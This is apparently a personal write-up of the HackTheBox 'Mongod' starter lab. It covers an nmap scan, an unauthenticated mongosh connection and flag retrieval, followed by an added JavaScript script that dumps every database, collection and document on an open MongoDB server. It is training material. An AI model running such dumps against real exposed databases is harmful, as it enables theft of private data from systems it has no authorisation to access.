Adam Bytes

// HTB · Getting Started · Tier 0

HTB: Mongod

Lab Objective: Mongod is the seventh machine in the Starting Point Tier 0 series, available with VIP access. We explore MongoDB, a document-oriented NoSQL database organised into databases, collections, and documents. Each document holds data in a JSON-like format (BSON on the wire) with fields such as strings, numbers, and dates. As with most of this tier, the vulnerability is a misconfiguration rather than a software bug: the database is reachable over the network and accepts connections without any credentials.

Transparency note: I used the walkthrough extensively throughout this lab. I had no prior knowledge of MongoDB and I detail what I took from that experience in the Final Thoughts below.

Enumeration

Following the walkthrough, the Nmap command used here is: nmap -p- --min-rate 1000 -sV {targetIP}

The flags: -p- scans all 65,535 TCP ports instead of Nmap's default top 1,000, which is how the non-standard MongoDB port shows up at all; --min-rate 1000 tells Nmap to send at least 1,000 packets per second so the full-range scan finishes in reasonable time; -sV probes each open port to identify the service and its version.

Task 1 — How many TCP ports are open?
Answer: 2.

Task 2 — Which service is running on port 27017?
Answer: MongoDB 3.6.8.

Task 3 — What type of database is MongoDB?
Answer: NoSQL.

Establishing a Foothold

Task 4 — What command launches the interactive MongoDB shell?
Answer: mongosh. Connect directly to the target: mongosh {targetIP}. With no port given, mongosh uses the default 27017, and the connection succeeds without a username or password. That is the misconfiguration the lab is built around: anyone who can reach the port can read the data.

Task 5 — What command lists all databases on the server?
Answer: show dbs.

Task 6 — What command lists collections in a database?
Answer: show collections.

Task 7 — What command dumps the content of all documents in a collection named flag?
Answer: db.flag.find(). With no filter argument, find() returns every document in the collection, and the shell prints them.

Task 8 — Submit the Flag.
Answer: Follow the steps above to retrieve it. Note that show collections and db.flag.find() operate on the currently selected database, so after show dbs you must first switch to the database that holds the flag collection with use {database name}.
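The Task 4 to Task 8 sequence is a manual walk of one database. The script below is an added example, not part of this write-up or the HTB walkthrough, that generalises it: it enumerates every database, every collection and every document an unauthenticated connection can see, then searches the dump for a given key. It relies on the mongosh API (Mongo.getDBNames(), Mongo.getDB(), Database.getCollectionNames(), Collection.find().toArray(), printjson()) and is meant to be loaded into mongosh against the target. The fakeMongo() stand-in and the SAMPLE data are constructed here purely so the logic can be checked offline; the database names and contents in SAMPLE are made up and are not the lab's.

```javascript
// Added example: dump everything reachable through an unauthenticated
// MongoDB connection. Not the original write-up's code.
//
// In mongosh:   mongosh {targetIP} --quiet dump_all.js
//          or:  load("dump_all.js"); dumpAll(db.getMongo());
// Under node the same functions run against a constructed stand-in.

// Databases MongoDB creates for itself; skipped by default because they
// rarely hold application data. "admin" is deliberately not skipped: on an
// unauthenticated server it shows whether any users were ever defined.
const DEFAULT_SKIP = ["local", "config"];

// mongo: a mongosh Mongo instance (db.getMongo()) or anything exposing the
// same getDBNames()/getDB(name) surface. Returns a plain nested object:
// { dbName: { collectionName: [documents...] } }.
function dumpAll(mongo, skip = DEFAULT_SKIP) {
  const result = {};
  for (const dbName of mongo.getDBNames()) {
    if (skip.includes(dbName)) continue;
    const database = mongo.getDB(dbName);
    result[dbName] = {};
    for (const collName of database.getCollectionNames()) {
      // toArray() drains the whole cursor, fine for this lab's tiny
      // collections; add .limit(n) before it on a real data store.
      result[dbName][collName] = database.getCollection(collName).find().toArray();
    }
  }
  return result;
}

// Search a dump for documents that carry a given field, e.g. "flag".
function findKey(dump, key) {
  const hits = [];
  for (const [dbName, colls] of Object.entries(dump)) {
    for (const [collName, docs] of Object.entries(colls)) {
      for (const doc of docs) {
        if (Object.prototype.hasOwnProperty.call(doc, key)) {
          hits.push({ db: dbName, collection: collName, value: doc[key] });
        }
      }
    }
  }
  return hits;
}

// Constructed stand-in for the Mongo object with only the three methods
// dumpAll() touches. Exists so the functions above can run without a server.
function fakeMongo(data) {
  return {
    getDBNames: () => Object.keys(data),
    getDB: (name) => ({
      getCollectionNames: () => Object.keys(data[name]),
      getCollection: (coll) => ({
        find: () => ({ toArray: () => data[name][coll].map((d) => ({ ...d })) }),
      }),
    }),
  };
}

// Made-up sample contents; names and values are not the lab's.
const SAMPLE = {
  admin: { "system.version": [{ _id: "featureCompatibilityVersion", version: "3.6" }] },
  local: { startup_log: [{ _id: "x", hostname: "mongod" }] },
  config: {},
  app_data: {
    users: [{ _id: 1, name: "alice" }],
    flag: [{ _id: 2, flag: "HTB{example_only}" }],
  },
};

// Entry point when run inside mongosh; `db` does not exist under node.
if (typeof db !== "undefined") {
  const dump = dumpAll(db.getMongo());
  printjson(dump);
  printjson(findKey(dump, "flag"));
}
```

Against the real target the second printjson is the shortcut: it lists which database and collection hold a field named flag without guessing database names one at a time. Keep in mind that against anything larger than a lab box a full dump is noisy and slow, which is why the skip list and the comment about .limit(n) are there.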

Final Thoughts

Enumeration tells me what services are running on a host. When I feel overwhelmed by an unfamiliar service, the right move is research — not frustration. I should document the process, including how I dealt with not knowing.
